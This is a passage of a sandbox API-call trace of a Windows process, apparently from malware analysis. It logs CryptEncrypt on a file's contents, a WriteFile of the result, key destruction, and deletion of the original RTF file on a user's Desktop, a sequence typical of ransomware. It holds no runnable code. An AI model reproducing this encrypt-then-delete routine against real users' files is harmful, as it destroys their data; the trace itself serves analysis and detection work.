hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0122.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0122.876] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2810, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2810*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.878] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.878] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0122.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0122.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0122.879] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.880] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xa86e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xa870) returned 1 [0122.880] CharLowerBuffW (in: lpsz="byte[43121]", cchLength=0xb | out: lpsz="byte[43121]") returned 0xb [0122.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.881] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c9978*, pdwDataLen=0x144e790*=0xa86e, dwBufLen=0xa870 | out: pbData=0x49c9978*, pdwDataLen=0x144e790*=0xa870) returned 1 [0122.881] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.881] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.881] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.881] WriteFile (in: hFile=0x258, lpBuffer=0x49b4888*, nNumberOfBytesToWrite=0xa870, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49b4888*, lpNumberOfBytesWritten=0x144f194*=0xa870, lpOverlapped=0x0) returned 1 [0122.883] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.883] CryptDestroyKey (hKey=0x41ac180) returned 1 [0122.883] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.899] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.899] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.900] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.900] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.900] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.900] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.900] CloseHandle (hObject=0x2a0) returned 1 [0122.900] CloseHandle (hObject=0x258) returned 1 [0122.903] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf", lpFilePart=0x0) returned 0x28 [0122.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0122.903] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\f9lczfridhfs.rtf")) returned 0x20 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0122.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.904] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0671400, ftCreationTime.dwHighDateTime=0x1d5ef84, ftLastAccessTime.dwLowDateTime=0x6169ec90, ftLastAccessTime.dwHighDateTime=0x1d5e98d, ftLastWriteTime.dwLowDateTime=0x6169ec90, ftLastWriteTime.dwHighDateTime=0x1d5e98d, nFileSizeHigh=0x0, nFileSizeLow=0xa86e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="f9lcZFridHfs.rtf", cAlternateFileName="F9LCZF~1.RTF")) returned 0x41ac2c0 [0122.904] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\f9lczfridhfs.rtf")) returned 1 [0122.916] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0671400, ftCreationTime.dwHighDateTime=0x1d5ef84, ftLastAccessTime.dwLowDateTime=0x6169ec90, ftLastAccessTime.dwHighDateTime=0x1d5e98d, ftLastWriteTime.dwLowDateTime=0x6169ec90, ftLastWriteTime.dwHighDateTime=0x1d5e98d, nFileSizeHigh=0x0, nFileSizeLow=0xa86e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="f9lcZFridHfs.rtf", cAlternateFileName="F9LCZF~1.RTF")) returned 0 [0122.916] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0122.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.917] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.917] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9e48 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.918] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.918] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.918] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 